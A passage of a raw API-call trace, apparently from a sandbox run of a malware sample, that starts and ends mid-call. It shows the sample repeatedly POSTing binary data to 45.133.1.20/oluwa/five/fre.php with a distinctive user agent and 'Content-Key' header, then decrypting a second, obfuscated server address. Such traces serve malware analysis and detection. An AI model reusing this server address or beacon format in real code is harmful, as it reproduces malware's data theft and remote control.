(HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.034] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0232.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.035] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0232.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.037] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0232.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.038] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0232.038] GetProcessHeap () returned 0x6a0000 [0232.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0232.038] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0232.038] GetProcessHeap () returned 0x6a0000 [0232.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0232.038] socket (af=2, type=1, protocol=6) returned 0x718 [0232.039] connect (s=0x718, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0232.065] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0232.065] GetProcessHeap () returned 0x6a0000 [0232.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0232.065] GetProcessHeap () returned 0x6a0000 [0232.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0232.066] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.068] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.068] GetProcessHeap () returned 0x6a0000 [0232.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c01d8 [0232.068] GetProcessHeap () returned 0x6a0000 [0232.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.069] GetProcessHeap () returned 0x6a0000 [0232.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0232.069] GetProcessHeap () returned 0x6a0000 [0232.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0232.070] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.071] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.071] GetProcessHeap () returned 0x6a0000 [0232.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0232.071] GetProcessHeap () returned 0x6a0000 [0232.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.071] send (s=0x718, buf=0x6bd460*, len=242, flags=0) returned 242 [0232.072] send (s=0x718, buf=0x6bb998*, len=159, flags=0) returned 159 [0232.072] GetProcessHeap () returned 0x6a0000 [0232.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0232.072] recv (in: s=0x718, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0232.137] GetProcessHeap () returned 0x6a0000 [0232.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0232.138] GetProcessHeap () returned 0x6a0000 [0232.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0232.139] GetProcessHeap () returned 0x6a0000 [0232.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c01d8 | out: hHeap=0x6a0000) returned 1 [0232.140] GetProcessHeap () returned 0x6a0000 [0232.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0232.142] closesocket (s=0x718) returned 0 [0232.143] GetProcessHeap () returned 0x6a0000 [0232.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0232.143] GetProcessHeap () returned 0x6a0000 [0232.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.144] GetProcessHeap () returned 0x6a0000 [0232.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0232.144] GetProcessHeap () returned 0x6a0000 [0232.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0232.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x144c) returned 0x718 [0232.147] Sleep (dwMilliseconds=0xea60) [0232.149] GetProcessHeap () returned 0x6a0000 [0232.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0232.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0232.169] GetProcessHeap () returned 0x6a0000 [0232.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0232.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.170] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0232.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.175] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.177] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.177] GetProcessHeap () returned 0x6a0000 [0232.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0232.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.179] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0232.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.187] CryptDestroyKey (hKey=0x6ad020) returned 1 [0232.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.188] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0232.188] GetProcessHeap () returned 0x6a0000 [0232.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.189] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.190] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.191] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.193] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.193] GetProcessHeap () returned 0x6a0000 [0232.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0232.193] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.193] GetProcessHeap () returned 0x6a0000 [0232.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0232.194] GetProcessHeap () returned 0x6a0000 [0232.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.194] GetProcessHeap () returned 0x6a0000 [0232.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0232.195] GetProcessHeap () returned 0x6a0000 [0232.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0232.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.207] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0232.213] GetProcessHeap () returned 0x6a0000 [0232.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0232.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.214] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0232.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.215] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.216] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.216] GetProcessHeap () returned 0x6a0000 [0232.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0232.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.218] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0232.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.219] CryptDestroyKey (hKey=0x6ad020) returned 1 [0232.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.219] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0232.219] GetProcessHeap () returned 0x6a0000 [0232.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.220] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0232.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.221] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0232.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.222] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0232.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.223] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0232.223] GetProcessHeap () returned 0x6a0000 [0232.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0232.223] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0232.223] GetProcessHeap () returned 0x6a0000 [0232.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0232.223] socket (af=2, type=1, protocol=6) returned 0x71c [0232.224] connect (s=0x71c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0232.256] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0232.256] GetProcessHeap () returned 0x6a0000 [0232.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0232.256] GetProcessHeap () returned 0x6a0000 [0232.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0232.257] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.258] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.258] GetProcessHeap () returned 0x6a0000 [0232.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bf8d8 [0232.258] GetProcessHeap () returned 0x6a0000 [0232.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.259] GetProcessHeap () returned 0x6a0000 [0232.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0232.259] GetProcessHeap () returned 0x6a0000 [0232.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0232.260] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.260] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.261] GetProcessHeap () returned 0x6a0000 [0232.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0232.261] GetProcessHeap () returned 0x6a0000 [0232.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.261] send (s=0x71c, buf=0x6bd460*, len=242, flags=0) returned 242 [0232.262] send (s=0x71c, buf=0x6bb998*, len=159, flags=0) returned 159 [0232.262] GetProcessHeap () returned 0x6a0000 [0232.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0232.262] recv (in: s=0x71c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0232.336] GetProcessHeap () returned 0x6a0000 [0232.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0232.337] GetProcessHeap () returned 0x6a0000 [0232.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0232.337] GetProcessHeap () returned 0x6a0000 [0232.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf8d8 | out: hHeap=0x6a0000) returned 1 [0232.338] GetProcessHeap () returned 0x6a0000 [0232.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0232.338] closesocket (s=0x71c) returned 0 [0232.339] GetProcessHeap () returned 0x6a0000 [0232.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0232.339] GetProcessHeap () returned 0x6a0000 [0232.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.339] GetProcessHeap () returned 0x6a0000 [0232.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0232.340] GetProcessHeap () returned 0x6a0000 [0232.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0232.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1450) returned 0x71c [0232.342] Sleep (dwMilliseconds=0xea60) [0232.344] GetProcessHeap () returned 0x6a0000 [0232.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0232.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0232.357] GetProcessHeap () returned 0x6a0000 [0232.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba4a0 [0232.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.358] CryptImportKey (in: hProv=0x6beb90, pbData=0x6ba4a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0232.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.359] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.360] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.360] GetProcessHeap () returned 0x6a0000 [0232.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba4a0 | out: hHeap=0x6a0000) returned 1 [0232.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.362] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0232.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.363] CryptDestroyKey (hKey=0x6ad020) returned 1 [0232.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.365] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0232.365] GetProcessHeap () returned 0x6a0000 [0232.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.366] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.367] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.368] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.369] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.369] GetProcessHeap () returned 0x6a0000 [0232.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0232.369] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.369] GetProcessHeap () returned 0x6a0000 [0232.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0232.370] GetProcessHeap () returned 0x6a0000 [0232.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.375] GetProcessHeap () returned 0x6a0000 [0232.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0232.375] GetProcessHeap () returned 0x6a0000 [0232.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0232.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0232.393] GetProcessHeap () returned 0x6a0000 [0232.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0232.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.480] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.481] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.483] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.483] GetProcessHeap () returned 0x6a0000 [0232.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0232.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.485] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0232.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.486] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0232.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.488] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0232.488] GetProcessHeap () returned 0x6a0000 [0232.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.489] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0232.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.493] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0232.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0232.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.496] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0232.496] GetProcessHeap () returned 0x6a0000 [0232.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0232.496] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", 